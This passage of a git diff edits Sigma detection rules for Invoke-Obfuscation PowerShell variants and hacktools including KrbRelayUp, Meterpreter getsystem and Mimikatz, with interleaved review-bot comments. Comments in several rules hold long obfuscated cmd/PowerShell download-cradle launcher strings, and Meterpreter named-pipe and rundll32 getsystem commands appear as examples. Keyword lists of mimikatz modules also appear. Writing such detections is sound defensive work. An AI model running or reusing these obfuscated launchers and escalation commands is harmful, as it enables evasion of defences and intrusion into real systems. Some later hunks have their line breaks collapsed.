+ # Example 1: Cmd /c" echo/Invoke-Expression (New-Object Net.WebClient).DownloadString |cLiP&& POWerSheLl -Nolog -sT . (\"{1}{2}{0}\"-f'pe','Ad',(\"{1}{0}\" -f'Ty','d-' ) ) -Assemb ( \"{5}{1}{3}{0}{2}{4}\" -f'ows','y','.F',(\"{0}{1}{2}\" -f'stem.W','i','nd'),( \"{0}{1}\"-f 'o','rms' ),'S' ) ; ([SySTEM.wiNDows.FoRmS.CLiPbOArd]::( \"{1}{0}\" -f (\"{1}{0}\" -f'T','TTeX' ),'gE' ).\"invO`Ke\"( ) ) ^| ^&( \"{5}{1}{2}{4}{3}{0}\" -f 'n',( \"{1}{0}\"-f'KE-','o' ),(\"{2}{1}{0}\"-f 'pRESS','x','e' ),'o','i','iNV') ; [System.Windows.Forms.Clipboard]::(\"{0}{1}\" -f( \"{1}{0}\"-f'e','SetT' ),'xt').\"InV`oKe\"( ' ')"
+ # Example 2: CMD/c " ECho Invoke-Expression (New-Object Net.WebClient).DownloadString|c:\WiNDowS\SySteM32\cLip && powershElL -noPRO -sTa ^& (\"{2}{0}{1}\" -f 'dd',(\"{1}{0}\"-f 'ype','-T' ),'A' ) -AssemblyN (\"{0}{3}{2}{1}{4}\"-f'Pr','nCo',(\"{0}{1}\"-f'e','ntatio'),'es','re' ) ; ^& ( ( [StRinG]${ve`RB`OSE`pr`e`FeReNCE} )[1,3] + 'x'-JoiN'') ( ( [sySTem.WInDOWs.ClipbOaRD]::( \"{1}{0}\" -f(\"{0}{1}\" -f'tTe','xt' ),'ge' ).\"IN`Vo`Ke\"( ) ) ) ; [System.Windows.Clipboard]::( \"{2}{1}{0}\" -f't',( \"{0}{1}\" -f 'tT','ex' ),'Se' ).\"In`V`oKe\"( ' ' )"
+ CommandLine|contains|all:
- cmd
- '&&'
- 'clipboard]::'
- -f
- CommandLine|contains:
+ CommandLine|contains:
- /c
- /r
condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
index b1203b0a9..9f87f2543 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
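Review bot: The commented-out `# CommandLine|re: '...'` line added above `CommandLine|contains|all:` carries no note on its status, so a reader cannot tell whether it is the original regex the `contains` list was derived from, a stricter variant for backends that support `re`, or dead text; the same applies to the corresponding lines in the invoke_obfuscation stdin, var, via_stdin, via_use_clip and via_var hunks of this patch (only the via_var one has a hint, `# FPs with |\/r`). A one-line lead such as `# Original regex form, kept for reference; the contains-based selection below is the backend-portable equivalent` (adjusted if the history differs) would make the intent explicit in each of them. The `# Example 1` / `# Example 2` lines are useful test material, but they are several hundred characters each on a single line; if the repository's YAML lint enforces a line length they will trip it, so consider pointing to them from `references` or keeping only the fragments the selection actually keys on.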
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
@@ -1,8 +1,7 @@
title: Invoke-Obfuscation Obfuscated IEX Invocation
id: 4bf943c6-5146-4273-98dd-e958fd1e3abf
status: test
-description: Detects all variations of obfuscated powershell IEX invocation code generated
- by Invoke-Obfuscation framework from the following code block
+description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
references:
- https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
@@ -22,13 +21,13 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- - CommandLine|re: \*mdr\*\W\s*\)\.Name
- - CommandLine|re: \$VerbosePreference\.ToString\(
- - CommandLine|re: \[String\]\s*\$VerbosePreference
+ - CommandLine|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
+ - CommandLine|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
+ - CommandLine|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
+ - CommandLine|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
+ - CommandLine|re: \*mdr\*\W\s*\)\.Name
+ - CommandLine|re: \$VerbosePreference\.ToString\(
+ - CommandLine|re: \[String\]\s*\$VerbosePreference
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml
index 8817b6ba9..d6ece1745 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml
@@ -3,7 +3,7 @@ id: 6c96fc76-0eb1-11eb-adc1-0242ac120002
status: test
description: Detects Obfuscated use of stdin to execute PowerShell
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25)
author: Jonathan Cheong, oscd.community
date: 2020/10/15
modified: 2022/11/17
@@ -21,17 +21,20 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_main:
- CommandLine|contains|all:
+ # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+powershell.+(?:\$\{?input\}?|noexit).+\"'
+ # Example 1: c:\windows\sYstEm32\CmD.eXE /C"echO\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -"
+ # Example 2: c:\WiNDOws\sysTEm32\cmd.EXe /C " ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )"
+ CommandLine|contains|all:
- cmd
- powershell
- CommandLine|contains:
+ CommandLine|contains:
- /c
- /r
selection_other:
- - CommandLine|contains: noexit
- - CommandLine|contains|all:
- - input
- - $
+ - CommandLine|contains: noexit
+ - CommandLine|contains|all:
+ - input
+ - $
condition: process_creation and (all of selection_*)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml
index 7200d5b17..e6ae9b449 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml
@@ -3,7 +3,7 @@ id: 27aec9c9-dbb0-4939-8422-1742242471d0
status: test
description: Detects Obfuscated use of Environment Variables to execute PowerShell
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24)
author: Jonathan Cheong, oscd.community
date: 2020/10/15
modified: 2022/11/17
@@ -21,11 +21,14 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"'
+ # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )"
+ # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) "
+ CommandLine|contains|all:
- cmd
- '"set'
- -f
- CommandLine|contains:
+ CommandLine|contains:
- /c
- /r
condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml
index 30aa40f03..451956d47 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml
@@ -3,7 +3,7 @@ id: 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7
status: test
description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)
author: Timur Zinniatullin, oscd.community
date: 2020/10/18
modified: 2022/12/29
@@ -21,10 +21,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- new-object
- text.encoding]::ascii
- CommandLine|contains:
+ CommandLine|contains:
- system.io.compression.deflatestream
- system.io.streamreader
- readtoend(
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
index fb6140d53..a069dd987 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
@@ -3,7 +3,7 @@ id: 9c14c9fa-1a63-4a64-8e57-d19280559490
status: test
description: Detects Obfuscated Powershell via Stdin in Scripts
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)
author: Nikita Nazarov, oscd.community
date: 2020/10/12
modified: 2022/11/16
@@ -21,10 +21,11 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ # CommandLine|re: '(?i).*(set).*&&\s?set.*(environment|invoke|\${?input).*&&.*"'
+ CommandLine|contains|all:
- set
- '&&'
- CommandLine|contains:
+ CommandLine|contains:
- environment
- invoke
- input
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
index 1508ebe40..7372e0b93 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
@@ -3,7 +3,7 @@ id: e1561947-b4e3-4a74-9bdd-83baed21bdb5
status: test
description: Detects Obfuscated Powershell via use Clip.exe in Scripts
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)
author: Nikita Nazarov, oscd.community
date: 2020/10/09
modified: 2022/11/16
@@ -21,11 +21,14 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ # CommandLine|re: '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*'
+ # Example 1: C:\WINdoWS\sySteM32\CMd /c " ECho\Invoke-Expression (New-Object Net.WebClient).DownloadString|Clip.Exe&&C:\WINdoWS\sySteM32\CMd /c pOWerSheLl -STa . ( \"{2}{0}{1}\"-f'dd-',(\"{0}{1}\" -f 'T','ype' ),'A' ) -Assembly ( \"{4}{1}{3}{0}{2}\"-f (\"{0}{1}\" -f 'nd','ow'),( \"{1}{0}\"-f'.W','stem' ),( \"{2}{1}{0}\" -f 'rms','Fo','s.'),'i','Sy') ; ${exeCUtIOnCONTeXT}.\"INV`oKECOM`m`ANd\".\"INV`ok`ESCriPT\"( ( [sYSteM.wiNDoWS.forMs.ClIPboaRD]::( \"{2}{0}{1}\" -f'Ex','t',(\"{0}{1}\" -f'Get','t' ) ).\"iNvo`Ke\"( )) ) ; [System.Windows.Forms.Clipboard]::(\"{1}{0}\" -f 'ar','Cle' ).\"in`V`oKE\"( )"
+ # Example 2: C:\WINDowS\sYsTEM32\CmD.eXE /C" echo\Invoke-Expression (New-Object Net.WebClient).DownloadString| C:\WIndOWs\SYSteM32\CLip &&C:\WINDowS\sYsTEM32\CmD.eXE /C POWERSHeLL -sT -noL [Void][System.Reflection.Assembly]::( \"{0}{3}{4}{1}{2}\" -f( \"{0}{1}\"-f'Lo','adW' ),( \"{0}{1}\"-f 'Par','t'),( \"{0}{1}{2}\"-f 'ial','N','ame'),'it','h' ).\"in`VO`KE\"( ( \"{3}{1}{4}{5}{2}{0}\"-f'rms','ystem.Windo','Fo','S','w','s.' )) ; ( [wIndows.fOrms.cLIPBOArD]::( \"{1}{0}\"-f'T',( \"{1}{0}\" -f'tEX','gET' )).\"i`Nvoke\"( ) ) ^^^| ^^^& ( ( ^^^& ( \"{2}{1}{0}\"-f 'e',( \"{2}{1}{0}\"-f'IABl','aR','v' ),( \"{0}{1}\"-f'Get','-' ) ) ( \"{1}{0}\"-f'*','*MDr' )).\"n`Ame\"[3,11,2]-jOin'') ; [Windows.Forms.Clipboard]::( \"{0}{1}\" -f (\"{1}{0}\"-f'tT','Se' ),'ext').\"in`VoKe\"(' ' )"
+ CommandLine|contains|all:
- echo
- clip
- '&&'
- CommandLine|contains:
+ CommandLine|contains:
- clipboard
- invoke
- i`
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
index 6e90c6df5..148ea3093 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
@@ -3,7 +3,7 @@ id: ac20ae82-8758-4f38-958e-b44a3140ca88
status: test
description: Detects Obfuscated Powershell via use MSHTA in Scripts
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)
author: Nikita Nazarov, oscd.community
date: 2020/10/08
modified: 2022/03/08
@@ -21,7 +21,7 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- set
- '&&'
- mshta
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml
index 1a65eff0c..0e67289e3 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml
@@ -3,7 +3,7 @@ id: e9f55347-2928-4c06-88e5-1a7f8169942e
status: test
description: Detects Obfuscated Powershell via VAR++ LAUNCHER
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)
author: Timur Zinniatullin, oscd.community
date: 2020/10/13
modified: 2022/11/16
@@ -21,12 +21,15 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ # CommandLine|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r
+ # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%"
+ # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%"
+ CommandLine|contains|all:
- '&&set'
- cmd
- /c
- -f
- CommandLine|contains:
+ CommandLine|contains:
- '{0}'
- '{1}'
- '{2}'
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml
index 5b099f42c..89e47bd7d 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml
@@ -24,17 +24,17 @@ detection: ParentCommandLine|endswith: .bat selection1: Image|endswith: \xcopy.exe - CommandLine|contains|all: + CommandLine|contains|all: - powershell.exe - .bat.exe selection2: Image|endswith: \xcopy.exe - CommandLine|contains|all: + CommandLine|contains|all: - pwsh.exe - .bat.exe selection3: Image|endswith: \attrib.exe - CommandLine|contains|all: + CommandLine|contains|all: - +s - +h - .bat.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml index 5153b45a4..a7b2810ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_koadic.yml @@ -23,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /q - /c - chcp diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml index 8da74de3c..aa7ecc79d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml @@ -19,20 +19,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \KrbRelay.exe - - OriginalFileName: KrbRelay.exe + - Image|endswith: \KrbRelay.exe + - OriginalFileName: KrbRelay.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -spn ' - ' -clsid ' - ' -rbcd ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - shadowcred - clsid - spn selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'spn ' - 'session ' - 'clsid ' 
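Review bot: The new comment `# In case the file has been renamed after compilation` on `OriginalFileName: KrbRelay.exe` is accurate for a renamed binary, but OriginalFileName is PE version-resource data that changes or disappears when the tool is rebuilt from source or has its resources edited, so it is not a robust fallback on its own. A fuller comment, `# Covers a renamed binary; OriginalFileName is PE metadata and is lost if the tool is recompiled, so the selection_cli_* groups are the backstop`, would set expectations for whoever tunes this rule. The `condition` that combines `selection_img` with the `selection_cli_*` groups lies outside this hunk.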
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml index b6a434f8d..2eb4c0b84 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml @@ -1,8 +1,7 @@ title: HackTool - KrbRelayUp Execution id: 12827a56-61a4-476a-a9cb-f3068f191073 status: test -description: Detects KrbRelayUp used to perform a universal no-fix local privilege - escalation in Windows domain environments where LDAP signing is not enforced +description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced references: - https://github.com/Dec0ne/KrbRelayUp author: Florian Roth (Nextron Systems) @@ -22,19 +21,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \KrbRelayUp.exe - - OriginalFileName: KrbRelayUp.exe + - Image|endswith: \KrbRelayUp.exe + - OriginalFileName: KrbRelayUp.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' relay ' - ' -Domain ' - ' -ComputerName ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' krbscm ' - ' -sc ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' spawn ' - ' -d ' - ' -cn ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml index 02ac8ed34..4fa0a620c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml 
@@ -1,8 +1,7 @@ title: HackTool - LocalPotato Execution id: 6bd75993-9888-4f91-9404-e1e4e4e34b77 status: test -description: Detects the execution of the LocalPotato POC based on basic PE metadata - information and default CLI examples +description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples references: - https://www.localpotato.com/localpotato_html/LocalPotato.html - https://github.com/decoder-it/LocalPotato @@ -23,7 +22,7 @@ detection: selection_img: Image|endswith: \LocalPotato.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - .exe -i C:\ - -o Windows\ selection_hash_plain: diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml index 0954a0794..b0a1b0b05 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml @@ -1,8 +1,7 @@ title: Potential Meterpreter/CobaltStrike Activity id: 15619216-e993-4721-b590-4c520615a67d status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service starting +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ 
@@ -24,22 +23,26 @@ detection: selection_img: ParentImage|endswith: \services.exe selection_technique_1: - CommandLine|contains|all: + # Examples: + # Meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1b (expanded env var): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + CommandLine|contains|all: - /c - echo - \pipe\ - CommandLine|contains: + CommandLine|contains: - cmd - '%COMSPEC%' selection_technique_2: - CommandLine|contains|all: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + CommandLine|contains|all: - rundll32 - .dll,a - '/p:' filter_defender: - CommandLine|contains: MpCmdRun - condition: process_creation and (selection_img and 1 of selection_technique_* - and not 1 of filter_*) + CommandLine|contains: MpCmdRun + condition: process_creation and (selection_img and 1 of selection_technique_* and not 1 of filter_*) fields: - ComputerName - User diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml index 363b63ff3..15ed3baed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml @@ -5,8 +5,7 @@ description: Detection well-known mimikatz command line arguments references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://tools.thehacker.recipes/mimikatz/modules -author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim - Shelton +author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton date: 2019/10/22 modified: 2023/02/21 tags: 
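Review bot: The example labelled `CobaltStrike getsystem technique 1b (expanded env var)` shows the same unexpanded `%COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a` command line as the `technique 1` example, so it does not illustrate the case it names. Presumably the resolved path was intended, e.g. `# CobaltStrike getsystem technique 1b (expanded env var): C:\Windows\System32\cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a`, which the `cmd` entry in the second `CommandLine|contains` list would match. Separately, `filter_defender` drops any matching event whose command line merely contains `MpCmdRun`; since that string sits in attacker-controlled data, a comment such as `# Substring exclusion on CommandLine; an attacker can embed "MpCmdRun" to evade, consider anchoring on Image instead` would record the trade-off for tuners.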
@@ -25,24 +24,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_tools_name: - CommandLine|contains: + CommandLine|contains: - DumpCreds - mimikatz - selection_function_names: - CommandLine|contains: - - ::aadcookie - - ::detours - - ::memssp - - ::mflt - - ::ncroutemon - - ::ngcsign - - ::printnightmare - - ::skeleton - - ::preshutdown - - ::mstsc - - ::multirdp + selection_function_names: # To cover functions from modules that are not in module_names + CommandLine|contains: + - ::aadcookie # misc module + - ::detours # misc module + - ::memssp # misc module + - ::mflt # misc module + - ::ncroutemon # misc module + - ::ngcsign # misc module + - ::printnightmare # misc module + - ::skeleton # misc module + - ::preshutdown # service module + - ::mstsc # ts module + - ::multirdp # ts module selection_module_names: - CommandLine|contains: + CommandLine|contains: - 'rpc::' - 'token::' - 'crypto::' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml index b1a339343..081824c71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml @@ -1,8 +1,7 @@ title: HackTool - PCHunter Execution id: fca949cc-79ca-446e-8064-01aa7e52ece5 status: test -description: Detects suspicious use of PCHunter, a tool like Process Hacker to view - and manipulate processes, kernel options and other low level stuff +description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff references: - http://www.xuetr.com/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ 
@@ -31,8 +30,8 @@ detection: - \PCHunter64.exe - \PCHunter32.exe selection_pe: - - OriginalFileName: PCHunter.exe - - Description: Epoolsoft Windows Information View Tools + - OriginalFileName: PCHunter.exe + - Description: Epoolsoft Windows Information View Tools selection_hashes: Hashes|contains: - SHA1=5F1CBC3D99558307BC1250D084FA968521482025 @@ -44,18 +43,18 @@ detection: - SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C - IMPHASH=0479F44DF47CFA2EF1CCC4416A538663 selection_hash_values: - - md5: - - 228dd0c2e6287547e26ffbd973a40f14 - - 987b65cd9b9f4e9a1afd8f8b48cf64a7 - - sha1: - - 5f1cbc3d99558307bc1250d084fa968521482025 - - 3fb89787cb97d902780da080545584d97fb1c2eb - - sha256: - - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 - - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c - - Imphash: - - 444d210cea1ff8112f256a4997eed7ff - - 0479f44df47cfa2ef1ccc4416a538663 + - md5: + - 228dd0c2e6287547e26ffbd973a40f14 + - 987b65cd9b9f4e9a1afd8f8b48cf64a7 + - sha1: + - 5f1cbc3d99558307bc1250d084fa968521482025 + - 3fb89787cb97d902780da080545584d97fb1c2eb + - sha256: + - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 + - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c + - Imphash: + - 444d210cea1ff8112f256a4997eed7ff + - 